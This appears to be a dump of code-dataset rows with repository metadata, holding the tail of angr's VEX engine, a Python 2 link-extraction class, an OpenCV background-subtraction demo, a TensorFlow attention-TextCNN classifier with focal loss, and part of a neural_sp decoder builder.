state.history.add_event('resilience', resilience_type='dirty', dirty=stmt.cee.name,
message='unsupported Dirty call')
except (SimSolverError, SimMemoryAddressError):
l.warning("%#x hit an error while analyzing statement %d", successors.addr, stmt_idx, exc_info=True)
has_default_exit = False
break
state.scratch.stmt_idx = num_stmts
successors.artifacts['insn_addrs'] = insn_addrs
# If there was an error, and not all the statements were processed,
# then this block does not have a default exit. This can happen if
# the block has an unavoidable "conditional" exit or if there's a legitimate
# error in the simulation
if has_default_exit:
l.debug("%s adding default exit.", self)
try:
next_expr = translate_expr(irsb.next, state)
state.history.extend_actions(next_expr.actions)
if o.TRACK_JMP_ACTIONS in state.options:
target_ao = SimActionObject(
next_expr.expr,
reg_deps=next_expr.reg_deps(), tmp_deps=next_expr.tmp_deps()
)
state.history.add_action(SimActionExit(state, target_ao, exit_type=SimActionExit.DEFAULT))
successors.add_successor(state, next_expr.expr, state.scratch.guard, irsb.jumpkind,
exit_stmt_idx='default', exit_ins_addr=state.scratch.ins_addr)
except KeyError:
# For some reason, the temporary variable that the successor relies on does not exist.
# It can be intentional (e.g. when executing a program slice)
# We save the current state anyways
successors.unsat_successors.append(state)
l.debug("The temporary variable for default exit of %s is missing.", self)
else:
l.debug("%s has no default exit", self)
# do return emulation and calless stuff
for exit_state in list(successors.all_successors):
exit_jumpkind = exit_state.history.jumpkind
if exit_jumpkind is None: exit_jumpkind = ""
if o.CALLLESS in state.options and exit_jumpkind == "Ijk_Call":
exit_state.registers.store(
exit_state.arch.ret_offset,
exit_state.se.Unconstrained('fake_ret_value', exit_state.arch.bits)
)
exit_state.scratch.target = exit_state.se.BVV(
successors.addr + irsb.size, exit_state.arch.bits
)
exit_state.history.jumpkind = "Ijk_Ret"
exit_state.regs.ip = exit_state.scratch.target
elif o.DO_RET_EMULATION in exit_state.options and \
(exit_jumpkind == "Ijk_Call" or exit_jumpkind.startswith('Ijk_Sys')):
l.debug("%s adding postcall exit.", self)
ret_state = exit_state.copy()
guard = ret_state.se.true if o.TRUE_RET_EMULATION_GUARD in state.options else ret_state.se.false
target = ret_state.se.BVV(successors.addr + irsb.size, ret_state.arch.bits)
if ret_state.arch.call_pushes_ret and not exit_jumpkind.startswith('Ijk_Sys'):
ret_state.regs.sp = ret_state.regs.sp + ret_state.arch.bytes
successors.add_successor(
ret_state, target, guard, 'Ijk_FakeRet', exit_stmt_idx='default',
exit_ins_addr=state.scratch.ins_addr
)
if whitelist and successors.is_empty:
# If statements of this block are white-listed and none of the exit statement (not even the default exit) is
# in the white-list, successors will be empty, and there is no way for us to get the final state.
# To this end, a final state is manually created
l.debug('Add an incomplete successor state as the result of an incomplete execution due to the white-list.')
successors.flat_successors.append(state)
def _handle_statement(self, state, successors, stmt):
"""
This function receives an initial state and imark and processes a list of pyvex.IRStmts
It annotates the request with a final state, last imark, and a list of SimIRStmts
"""
if type(stmt) == pyvex.IRStmt.IMark:
ins_addr = stmt.addr + stmt.delta
state.scratch.ins_addr = ins_addr
# Raise an exception if we're suddenly in self-modifying code
for subaddr in xrange(stmt.len):
if subaddr + stmt.addr in state.scratch.dirty_addrs:
raise SimReliftException(state)
state._inspect('instruction', BP_AFTER)
l.debug("IMark: %#x", stmt.addr)
state.scratch.num_insns += 1
state._inspect('instruction', BP_BEFORE, instruction=ins_addr)
# process it!
s_stmt = translate_stmt(stmt, state)
if s_stmt is not None:
state.history.extend_actions(s_stmt.actions)
# for the exits, put *not* taking the exit on the list of constraints so
# that we can continue on. Otherwise, add the constraints
if type(stmt) == pyvex.IRStmt.Exit:
l.debug("%s adding conditional exit", self)
# Produce our successor state!
# Let SimSuccessors.add_successor handle the nitty gritty details
exit_state = state.copy()
successors.add_successor(exit_state, s_stmt.target, s_stmt.guard, s_stmt.jumpkind,
exit_stmt_idx=state.scratch.stmt_idx, exit_ins_addr=state.scratch.ins_addr)
# Do our bookkeeping on the continuing state
cont_condition = claripy.Not(s_stmt.guard)
state.add_constraints(cont_condition)
state.scratch.guard = claripy.And(state.scratch.guard, cont_condition)
def lift(self,
state=None,
clemory=None,
insn_bytes=None,
arch=None,
addr=None,
size=None,
num_inst=None,
traceflags=0,
thumb=False,
opt_level=None):
"""
Lift an IRSB.
There are many possible valid sets of parameters. You at the very least must pass some
source of data, some source of an architecture, and some source of an address.
Sources of data in order of priority: insn_bytes, clemory, state
Sources of an address, in order of priority: addr, state
Sources of an architecture, in order of priority: arch, clemory, state
:param state: A state to use as a data source.
:param clemory: A cle.memory.Clemory object to use as a data source.
:param addr: The address at which to start the block.
:param thumb: Whether the block should be lifted in ARM's THUMB mode.
:param opt_level: The VEX optimization level to use. The final IR optimization level is determined by
(ordered by priority):
- Argument opt_level
- opt_level is set to 1 if OPTIMIZE_IR exists in state options
- self._default_opt_level
:param insn_bytes: A string of bytes to use as a data source.
:param size: The maximum size of the block, in bytes.
:param num_inst: The maximum number of instructions.
:param traceflags: traceflags to be passed to VEX. (default: 0)
"""
# phase 0: sanity check
if not state and not clemory and not insn_bytes:
raise ValueError("Must provide state or clemory or insn_bytes!")
if not state and not clemory and not arch:
raise ValueError("Must provide state or clemory or arch!")
if addr is None and not state:
raise ValueError("Must provide state or addr!")
if arch is None:
arch = clemory._arch if clemory else state.arch
if arch.name.startswith("MIPS") and self._single_step:
l.error("Cannot specify single-stepping on MIPS.")
self._single_step = False
# phase 1: parameter defaults
if addr is None:
addr = state.se.eval(state._ip)
if size is not None:
size = min(size, VEX_IRSB_MAX_SIZE)
if size is None:
size = VEX_IRSB_MAX_SIZE
if num_inst is not None:
num_inst = min(num_inst, VEX_IRSB_MAX_INST)
if num_inst is None and self._single_step:
num_inst = 1
if opt_level is None:
if state and o.OPTIMIZE_IR in state.options:
opt_level = 1
else:
opt_level = self._default_opt_level
if self._support_selfmodifying_code:
if opt_level > 0:
l.warning("Self-modifying code is not always correctly optimized by PyVEX. To guarantee correctness, VEX optimizations have been disabled.")
opt_level = 0
if state and o.OPTIMIZE_IR in state.options:
state.options.remove(o.OPTIMIZE_IR)
# phase 2: thumb normalization
thumb = int(thumb)
if isinstance(arch, ArchARM):
if addr % 2 == 1:
thumb = 1
if thumb:
addr &= ~1
elif thumb:
l.error("thumb=True passed on non-arm architecture!")
thumb = 0
# phase 3: check cache
cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level)
if self._use_cache and cache_key in self._block_cache:
self._cache_hit_count += 1
irsb = self._block_cache[cache_key]
stop_point = self._first_stoppoint(irsb)
if stop_point is None:
return irsb
else:
size = stop_point - addr
# check the cache again
cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level)
if cache_key in self._block_cache:
self._cache_hit_count += 1
return self._block_cache[cache_key]
else:
self._cache_miss_count += 1
else:
self._cache_miss_count += 1
# phase 4: get bytes
if insn_bytes is not None:
buff, size = insn_bytes, len(insn_bytes)
else:
buff, size = self._load_bytes(addr, size, state, clemory)
if not buff or size == 0:
raise SimEngineError("No bytes in memory for block starting at %#x." % addr)
# phase 5: call into pyvex
l.debug("Creating pyvex.IRSB of arch %s at %#x", arch.name, addr)
try:
for subphase in xrange(2):
irsb = pyvex.IRSB(buff, addr + thumb, arch,
num_bytes=size,
num_inst=num_inst,
bytes_offset=thumb,
traceflags=traceflags,
opt_level=opt_level)
if subphase == 0:
# check for possible stop points
stop_point = self._first_stoppoint(irsb)
if stop_point is not None:
size = stop_point - addr
continue
if self._use_cache:
self._block_cache[cache_key] = irsb
return irsb
# phase x: error handling
except pyvex.PyVEXError:
l.debug("VEX translation error at %#x", addr)
if isinstance(buff, str):
l.debug('Using bytes: ' + buff)
else:
l.debug("Using bytes: " + str(pyvex.ffi.buffer(buff, size)).encode('hex'))
e_type, value, traceback = sys.exc_info()
raise SimTranslationError, ("Translation error", e_type, value), traceback
def _load_bytes(self, addr, max_size, state=None, clemory=None):
if not clemory:
if state is None:
raise SimEngineError('state and clemory cannot both be None in _load_bytes().')
if o.ABSTRACT_MEMORY in state.options:
# abstract memory
clemory = state.memory.regions['global'].memory.mem._memory_backer
else:
# symbolic memory
clemory = state.memory.mem._memory_backer
buff, size = "", 0
# Load from the clemory if we can
smc = self._support_selfmodifying_code
if state:
try:
p = state.memory.permissions(addr)
if p.symbolic:
smc = True
else:
smc = claripy.is_true(p & 2 != 0)
except: # pylint: disable=bare-except
smc = True # I don't know why this would ever happen, we checked this right?
if not smc or not state:
try:
buff, size = clemory.read_bytes_c(addr)
except KeyError:
pass
# If that didn't work, try to load from the state
if size == 0 and state:
if addr in state.memory and addr + max_size - 1 in state.memory:
buff = state.se.eval(state.memory.load(addr, max_size, inspect=False), cast_to=str)
size = max_size
else:
good_addrs = []
for i in xrange(max_size):
if addr + i in state.memory:
good_addrs.append(addr + i)
else:
break
buff = ''.join(chr(state.se.eval(state.memory.load(i, 1, inspect=False))) for i in good_addrs)
size = len(buff)
size = min(max_size, size)
return buff, size
def _first_stoppoint(self, irsb):
"""
Enumerate the imarks in the block. If any of them (after the first one) are at a stop point, returns the address
of the stop point. None is returned otherwise.
"""
if self._stop_points is None:
return None
first_imark = True
for stmt in irsb.statements:
if isinstance(stmt, pyvex.stmt.IMark):
addr = stmt.addr + stmt.delta
if not first_imark and addr in self._stop_points:
# could this part be moved by pyvex?
return addr
first_imark = False
return None
def clear_cache(self):
self._block_cache = LRUCache(maxsize=self._cache_size)
self._cache_hit_count = 0
self._cache_miss_count = 0
#
# Pickling
#
def __setstate__(self, state):
super(SimEngineVEX, self).__setstate__(state)
self._stop_points = state['_stop_points']
self._use_cache = state['_use_cache']
self._default_opt_level = state['_default_opt_level']
self._support_selfmodifying_code = state['_support_selfmodifying_code']
self._single_step = state['_single_step']
self._cache_size = state['_cache_size']
# rebuild block cache
self._initialize_block_cache()
def __getstate__(self):
s = super(SimEngineVEX, self).__getstate__()
s['_stop_points'] = self._stop_points
s['_use_cache'] = self._use_cache
s['_default_opt_level'] = self._default_opt_level
s['_support_selfmodifying_code'] = self._support_selfmodifying_code
s['_single_step'] = self._single_step
s['_cache_size'] = self._cache_size
return s
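# Usage sketch (assumption: angr is installed and a project/state were created
# elsewhere; in normal use the engine is driven through angr's factory rather
# than instantiated directly):
#   engine = SimEngineVEX()
#   successors = engine.process(state)   # SimSuccessors for one basic block
#   irsb = engine.lift(state=state)      # lift the block at state's ip without executing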
| [
"[email protected]"
] | |
f6626102fabf2650c694713c2ad5149437e06451 | 0dec4bee4820161ae892f615023dd6ff9dae8ff4 | /PyMrawler/SocialEventCrawlerGR/Links.py | 40ddb5a031bebced3cf662f7c038a859ef7f5f1d | [] | no_license | mpetyx/PyMrawler | 8fbf77276838f3e26b746205f5ded33e9c5be559 | 6f7dc608620ddfff1c3021aa740cf8409a7eb311 | refs/heads/master | 2016-09-10T00:16:49.353207 | 2012-10-17T10:13:15 | 2012-10-17T10:13:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | '''
Created on 11 Dec 2011
@author: mpetyx
'''
class Link:
def __init__(self,text):
"""
Here we search all the links included in the description
"""
self.links = None
from TextHandling import TextFunctions
        self.raw_text = text  # keep the raw string for the regex searches below
        self.text = TextFunctions(text)
self.lines = self.text.lines
self.words = []
    def find_links(self):
        # named find_links so it does not shadow the self.links attribute
        import re
        # parsing addresses
        # http://stackoverflow.com/questions/6173/regular-expression-for-parsing-links-from-a-webpage
        # non-capturing scheme group so findall() returns whole URLs, plus
        # IGNORECASE so lower-case addresses match too
        self.links = re.findall(r'\b(?:https?|ftp|file)://[-A-Z0-9+&@#/%?=~_|!:,.;]*[-A-Z0-9+&@#/%=~_|]',
                                self.raw_text, re.IGNORECASE)
        return self.links
    def youtube(self):
        if self.links is None:
            self.find_links()
        self.youtubeLinks = []
        for link in self.links:
            if "youtube" in link:
                self.youtubeLinks.append(link)
        return self.youtubeLinks
    def parse_url(self):
        # regexes that split a URL into scheme, host, path and fragment parts
        e = r'((http|ftp):/)?/?([^:/\s]+)((/\w+)*/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?'
        e2 = r'^((http|ftp):/)?/?([^:/\s]+)((/\w+)*/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?$'
        return e, e2
def simple_parse(self):
for line in self.lines:
if "www" in line:
print line
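# Example (hypothetical text; assumes the TextHandling module is importable):
#   link = Link("see http://www.youtube.com/watch?v=abc and http://example.com/a.html")
#   print link.find_links()
#   print link.youtube()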
| [
"[email protected]"
] | |
34356c92a49affa75602a75e6add206fdd9417a7 | 012837eafe45c8f7ee5fc77d4c4d7725d5314c5c | /workshops/8-day/8-clazz.py | 6322475cba90b04e02f631dcfd665c48f6e3d371 | [
"MIT"
] | permissive | ai-erorr404/opencv-practice | e9408cf006779a678cf3a30fc60e9dbeb3c8e493 | 60ef5e4aec61ee5f7e675fb919e8f612e59f664a | refs/heads/master | 2021-02-08T11:17:04.763522 | 2020-02-22T09:43:04 | 2020-02-22T09:43:04 | 244,146,060 | 1 | 1 | MIT | 2020-03-01T12:35:02 | 2020-03-01T12:35:01 | null | UTF-8 | Python | false | false | 1,854 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
import cv2 as cv
"""
视频前景/背景提取
视频前景/背景提取技术用于提取前景移动对象,通过获取移动对象的mask实现获取移动物体的轮廓信息,最常用的方法是帧差相减法进行,即用
前一帧的图像最为背景图像与当前帧进行相减,该方法对光照、噪声相当敏感。opencv中对背景模型提取的算法有两种,一种是基于高斯模糊模型(GMM)
实现背景提取,另外一种是使用最近相邻模型(KNN)实现的,api如下:
GMM cv.createBackgroundSubtractorMOG2(history, varThreshold, detectShadows)
- history: 过往帧数,默认500帧,历史进行比较
- varThreshold: 马氏距离,默认16,值越大,最新的像素会归为前景,值越小对光照敏感
- detectShadow: 是否保留阴影检测,默认True, 开启阴影检测虽然可以提高提取效果,但是效率会变低,推荐不开启
KNN cv.createBackgroundSubtractorKNN()的参数描述如上
"""
def main():
capture = cv.VideoCapture(0)
    # mog2bs = cv.createBackgroundSubtractorKNN(500, 1000, False)  # KNN model
    mog2bs = cv.createBackgroundSubtractorMOG2(300)  # GMM model
while True:
ret, frame = capture.read()
        if not ret:
print("can't read any video!")
break
mask = mog2bs.apply(frame)
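        # apply() updates the background model and returns the foreground mask; an
        # optional third learningRate argument (0..1, or -1 for automatic) controls
        # how fast the model absorbs scene changes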
background = mog2bs.getBackgroundImage()
cv.imshow("input", frame)
cv.imshow("mask", mask)
cv.imshow("background", background)
key = cv.waitKey(10) & 0xff
if 27 == key: # ESC
break
cv.destroyAllWindows()
capture.release()
if "__main__" == __name__:
main()
| [
"[email protected]"
] | |
c5b3e70cd3d41f6a2d4b0180f56af70231b4bae0 | 12d05a7f65e6ca8ffa701670ed1bec209af77a51 | /models/Attention_Textcnn_loss_para/network.py | b5a447c68d31e9b7261fa5b9adbf9aa16bbb0620 | [] | no_license | Bobby-Han/text-classification | ec8015e6bb438fceb8d7b61117519e2d6469c57d | 2fa6d3ed4f3b9288ff7fb385c9cced44daf522ca | refs/heads/master | 2023-02-24T13:27:36.761439 | 2021-02-01T06:27:53 | 2021-02-01T06:27:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,421 | py | # -*- coding:utf-8 -*-
import tensorflow as tf
import tensorflow.contrib.layers as layers
import numpy as np
from tensorflow.contrib.crf import crf_log_likelihood
import keras.backend as K
class Settings(object):
def __init__(self):
self.model_name = 'Attention_TextCNN_loss_para'
self.fact_len = 200
self.filter_sizes = [1, 2, 3, 4, 5]
self.n_filter = 256
self.fc_hidden_size = 2000
self.hidden_size = 256
self.n_class = 202
self.loss_type = 'focal_loss'
self.summary_path = '../../summary/' + self.model_name + '/'
self.ckpt_path = '../../ckpt/' + self.model_name + '/'
self.log_path = '../../log/' + self.model_name + '/'
class Atten_TextCNN(object):
def __init__(self, W_embedding, settings):
self.model_name = settings.model_name
self.fact_len = settings.fact_len
self.hidden_size = settings.hidden_size
self.n_class = settings.n_class
self.filter_sizes = settings.filter_sizes
self.n_filter = settings.n_filter
self.n_filter_total = self.n_filter * len(self.filter_sizes)
self.fc_hidden_size = settings.fc_hidden_size
self.loss_type = settings.loss_type
self._global_step = tf.Variable(0, trainable=False, name='Global_Step')
self.update_emas = list()
self._tst = tf.placeholder(tf.bool)
self._keep_prob = tf.placeholder(tf.float32, [])
self._batch_size = tf.placeholder(tf.int32, [])
with tf.name_scope('Inputs'):
self._X_inputs = tf.placeholder(tf.int32, [None, self.fact_len], name='X_input')
self._y_inputs = tf.placeholder(tf.float32, [None, self.n_class], name='y_input')
with tf.variable_scope('embedding'):
self.embedding = tf.get_variable(name='embedding', shape=W_embedding.shape,
initializer=tf.constant_initializer(W_embedding), trainable=True)
self.embedding_size = W_embedding.shape[1]
with tf.variable_scope('Atten_TextCNN'):
output = self._inference(self._X_inputs)
with tf.variable_scope('fc-bn-layer'):
W_fc = self.weight_variable([self.n_filter_total, self.fc_hidden_size], name='Weight_fc')
tf.summary.histogram('W_fc', W_fc)
h_fc = tf.matmul(output, W_fc, name='h_fc')
beta_fc = tf.Variable(tf.constant(0.1, tf.float32, shape=[self.fc_hidden_size], name="beta_fc"))
tf.summary.histogram('beta_fc', beta_fc)
fc_bn, update_ema_fc = self.batchnorm(h_fc, beta_fc, convolutional=False)
self.update_emas.append(update_ema_fc)
self.fc_bn_relu = tf.nn.relu(fc_bn, name="relu")
with tf.variable_scope('out_layer'):
W_out = self.weight_variable([self.fc_hidden_size, self.n_class], name='Weight_out')
tf.summary.histogram('Weight_out', W_out)
b_out = self.bias_variable([self.n_class], name='bias_out')
tf.summary.histogram('bias_out', b_out)
            self._y_pred = tf.nn.xw_plus_b(self.fc_bn_relu, W_out, b_out, name='y_pred')  # raw score for each class
self.labels = tf.sigmoid(self._y_pred)
# with tf.name_scope('loss'):
# self._loss = tf.reduce_mean(
# tf.nn.sigmoid_cross_entropy_with_logits(logits=self._y_pred, labels=self._y_inputs))
# tf.summary.scalar('loss', self._loss)
with tf.name_scope('loss'):
self._loss = self.focal_loss(self.y_inputs, self.y_pred)
self.saver = tf.train.Saver(max_to_keep=1)
def focal_loss(self, labels, logits, gamma=2.0, alpha=0.25, normalize=True):
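        # Focal loss (Lin et al., 2017) down-weights easy, well-classified examples
        # so training concentrates on hard ones: gamma sets how sharply easy examples
        # are suppressed, alpha balances positive vs. negative labels, and with
        # normalize=True the summed loss is divided by the number of positive labels
        # whenever any are present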
labels = tf.where(labels > 0, tf.ones_like(labels), tf.zeros_like(labels))
labels = tf.cast(labels, tf.float32)
probs = tf.sigmoid(logits)
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
alpha_t = tf.ones_like(logits) * alpha
alpha_t = tf.where(labels > 0, alpha_t, 1.0 - alpha_t)
probs_t = tf.where(labels > 0, probs, 1.0 - probs)
        # tf.where(cond, a, b): a and b are same-shaped tensors; positions where cond
        # is True keep the element of a, all other positions take the element of b
focal_matrix = alpha_t * tf.pow((1.0 - probs_t), gamma)
loss = focal_matrix * ce_loss
loss = tf.reduce_sum(loss)
if normalize:
n_pos = tf.reduce_sum(labels)
# total_weights = tf.stop_gradient(tf.reduce_sum(focal_matrix))
# total_weights = tf.Print(total_weights, [n_pos, total_weights])
# loss = loss / total_weights
def has_pos():
return loss / tf.cast(n_pos, tf.float32)
def no_pos():
#total_weights = tf.stop_gradient(tf.reduce_sum(focal_matrix))
#return loss / total_weights
return loss
loss = tf.cond(n_pos > 0, has_pos, no_pos)
return loss
def loss_func(self, logits, labels):
# logits = logits[:, 0, 0, 0]
# labels = tf.equal(labels, 1)
labels = tf.cast(labels, tf.float32)
if self.loss_type == 'focal_loss':
loss = self.focal_loss(labels=labels, logits=logits,
gamma=2.0, alpha=0.25)
elif self.loss_type == 'ce_loss':
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
labels = labels, logits = logits)
num_samples = tf.cast(tf.reduce_prod(tf.shape(labels)), tf.float32)
loss = tf.reduce_sum(ce_loss) / num_samples
elif self.loss_type == 'cls_balance':
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
labels = labels, logits = logits)
pos_weight = tf.cast(tf.equal(labels, 1), tf.float32)
neg_weight = 1 - pos_weight
n_pos = tf.reduce_sum(pos_weight)
n_neg = tf.reduce_sum(neg_weight)
def has_pos():
return tf.reduce_sum(ce_loss * pos_weight) / n_pos
def has_neg():
return tf.reduce_sum(ce_loss * neg_weight) / n_neg
def no():
return tf.constant(0.0)
pos_loss = tf.cond(n_pos > 0, has_pos, no)
neg_loss = tf.cond(n_neg > 0, has_neg, no)
loss = (pos_loss + neg_loss) / 2.0
# elif self.loss_type == 'ohnm':
# ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
# labels = labels, logits = logits)
# pos_weight = tf.cast(tf.equal(labels, 1), tf.float32)
# neg_weight = 1 - pos_weight
# n_pos = tf.reduce_sum(pos_weight)
# n_neg = tf.reduce_sum(neg_weight)
#
#
# # find the most wrongly classified negative examples:
# n_selected = tf.minimum(n_pos * 3, n_neg)
# n_selected = tf.cast(tf.maximum(n_selected, 1), tf.int32)
#
# neg_mask = tf.equal(labels, 0)
# hardness = tf.where(neg_mask, ce_loss, tf.zeros_like(ce_loss))
# vals, _ = tf.nn.top_k(neg_scores, k = n_selected)
# th = vals[-1]
# selected_neg_mask = tf.logical_and(hardness >= th, neg_mask)
# neg_weight = tf.cast(selected_neg_mask, tf.float32)
#
# loss_weight = pos_weight + neg_weight
# loss = tf.reduce_sum(ce_loss * loss_weight) / tf.reduce_sum(loss_weight)
elif self.loss_type == 'ohem':
ce_loss = tf.nn.sigmoid_cross_entropy_with_logits(
labels = labels, logits = logits)
# find the most wrongly classified examples:
num_examples = tf.reduce_prod(labels.shape)
n_selected = tf.cast(num_examples / 2, tf.int32)
vals, _ = tf.nn.top_k(ce_loss, k = n_selected)
th = vals[-1]
selected_mask = ce_loss >= th
loss_weight = tf.cast(selected_mask, tf.float32)
loss = tf.reduce_sum(ce_loss * loss_weight) / tf.reduce_sum(loss_weight)
else:
            raise ValueError('Unknown loss_type:', self.loss_type)
return loss
@property
def tst(self):
return self._tst
@property
def keep_prob(self):
return self._keep_prob
@property
def batch_size(self):
return self._batch_size
@property
def global_step(self):
return self._global_step
@property
def X_inputs(self):
return self._X_inputs
@property
def y_inputs(self):
return self._y_inputs
@property
def y_pred(self):
return self._y_pred
@property
def loss(self):
return self._loss
def weight_variable(self, shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=name)
def bias_variable(self, shape, name):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
def batchnorm(self, Ylogits, offset, convolutional=False):
exp_moving_avg = tf.train.ExponentialMovingAverage(0.999, self._global_step)
bnepsilon = 1e-5
if convolutional:
mean, variance = tf.nn.moments(Ylogits, [0, 1, 2])
else:
mean, variance = tf.nn.moments(Ylogits, [0])
        update_moving_averages = exp_moving_avg.apply([mean, variance])
        m = tf.cond(self.tst, lambda: exp_moving_avg.average(mean), lambda: mean)
        v = tf.cond(self.tst, lambda: exp_moving_avg.average(variance), lambda: variance)
        Ybn = tf.nn.batch_normalization(Ylogits, m, v, offset, None, bnepsilon)
        return Ybn, update_moving_averages
def task_specific_attention(self, inputs, output_size,
initializer=layers.xavier_initializer(),
activation_fn=tf.tanh, scope=None):
assert len(inputs.get_shape()) == 3 and inputs.get_shape()[-1].value is not None
with tf.variable_scope(scope or 'attention') as scope:
attention_context_vector = tf.get_variable(name='attention_context_vector', shape=[output_size],
initializer=initializer, dtype=tf.float32)
input_projection = layers.fully_connected(inputs, output_size,
activation_fn=activation_fn, scope=scope)
vector_attn = tf.reduce_sum(tf.multiply(input_projection, attention_context_vector),
axis=2, keep_dims=True)
attention_weights = tf.nn.softmax(vector_attn, dim=1)
            tf.summary.histogram('attention_weights', attention_weights)
weighted_projection = tf.multiply(inputs, attention_weights)
return weighted_projection
def TextCNN(self, X_inputs, n_step):
inputs = tf.expand_dims(X_inputs, -1)
pooled_outputs = list()
for i, filter_size in enumerate(self.filter_sizes):
with tf.variable_scope("conv-maxpool-%s" % filter_size):
filter_shape = [filter_size, self.embedding_size, 1, self.n_filter]
W_filter = self.weight_variable(shape=filter_shape, name='W_filter')
beta = self.bias_variable(shape=[self.n_filter], name='beta_filter')
tf.summary.histogram('beta', beta)
conv = tf.nn.conv2d(inputs, W_filter, strides=[1, 1, 1, 1], padding="VALID", name="conv")
conv_bn, update_ema = self.batchnorm(conv, beta, convolutional=True)
h = tf.nn.relu(conv_bn, name="relu")
pooled = tf.nn.max_pool(h, ksize=[1, n_step - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1], padding='VALID', name="pool")
pooled_outputs.append(pooled)
self.update_emas.append(update_ema)
h_pool = tf.concat(pooled_outputs, 3)
h_pool_flat = tf.reshape(h_pool, [-1, self.n_filter_total])
return h_pool_flat
def _inference(self, X_inputs):
inputs = tf.nn.embedding_lookup(self.embedding, X_inputs)
output_att = self.task_specific_attention(inputs, self.embedding_size)
textcnn_out = self.TextCNN(output_att, self.fact_len)
return textcnn_out
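# ----------------------------------------------------------------------
# Hedged sanity-check sketch (added for illustration, not part of the
# original file): reproduces the focal-loss formula implemented above,
# FL = sum(alpha_t * (1 - p_t)^gamma * CE), in plain NumPy so the TF
# version can be eyeballed against it. All values below are made up.
if __name__ == '__main__':
    import numpy as np
    logits = np.array([2.0, -1.0, 0.5])
    labels = np.array([1.0, 0.0, 1.0])
    probs = 1.0 / (1.0 + np.exp(-logits))
    ce = -(labels * np.log(probs) + (1.0 - labels) * np.log(1.0 - probs))
    alpha_t = np.where(labels > 0, 0.25, 0.75)   # alpha for positives, 1-alpha otherwise
    p_t = np.where(labels > 0, probs, 1.0 - probs)
    print((alpha_t * (1.0 - p_t) ** 2.0 * ce).sum())  # unnormalized focal loss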
| [
"[email protected]"
] | |
0c1776f6bd320e7f308bee7b96fd85ce0f010a7c | aed0016db7f4d22e7d66e6fddb7bf4ef68a3c692 | /neural_sp/models/seq2seq/decoders/build.py | 0f813cfcdda9ab87c1f3eab770b881268e309039 | [] | no_license | thanhkm/neural_sp | 6a5575111c83d1fdd97edec21f90fe647965cb69 | 1a5a5ed54f4cb79436007593dbd0d782b246a0c7 | refs/heads/master | 2020-12-26T23:22:56.964151 | 2020-01-15T23:40:22 | 2020-01-15T23:40:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,001 | py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Select an decoder network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def build_decoder(args, special_symbols, enc_n_units, vocab,
ctc_weight, ctc_fc_list, global_weight,
lm_fusion=None, lm_init=None):
if args.dec_type == 'transformer':
if args.attn_type == 'cif':
raise NotImplementedError
else:
from neural_sp.models.seq2seq.decoders.transformer import TransformerDecoder
decoder = TransformerDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
            backward=(dir == 'bwd'),  # NOTE: 'dir' is the Python builtin here, so this always evaluates to False
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type == 'transformer_transducer':
        raise NotImplementedError  # the transducer wiring below is kept for reference but never reached
from neural_sp.models.seq2seq.decoders.transformer_transducer import TrasformerTransducer
decoder = TrasformerTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type in ['lstm_transducer', 'gru_transducer']:
from neural_sp.models.seq2seq.decoders.rnn_transducer import RNNTransducer
decoder = RNNTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init)
else:
from neural_sp.models.seq2seq.decoders.las import RNNDecoder
decoder = RNNDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.attn_type,
attn_dim=args.attn_dim,
attn_sharpening_factor=args.attn_sharpening_factor,
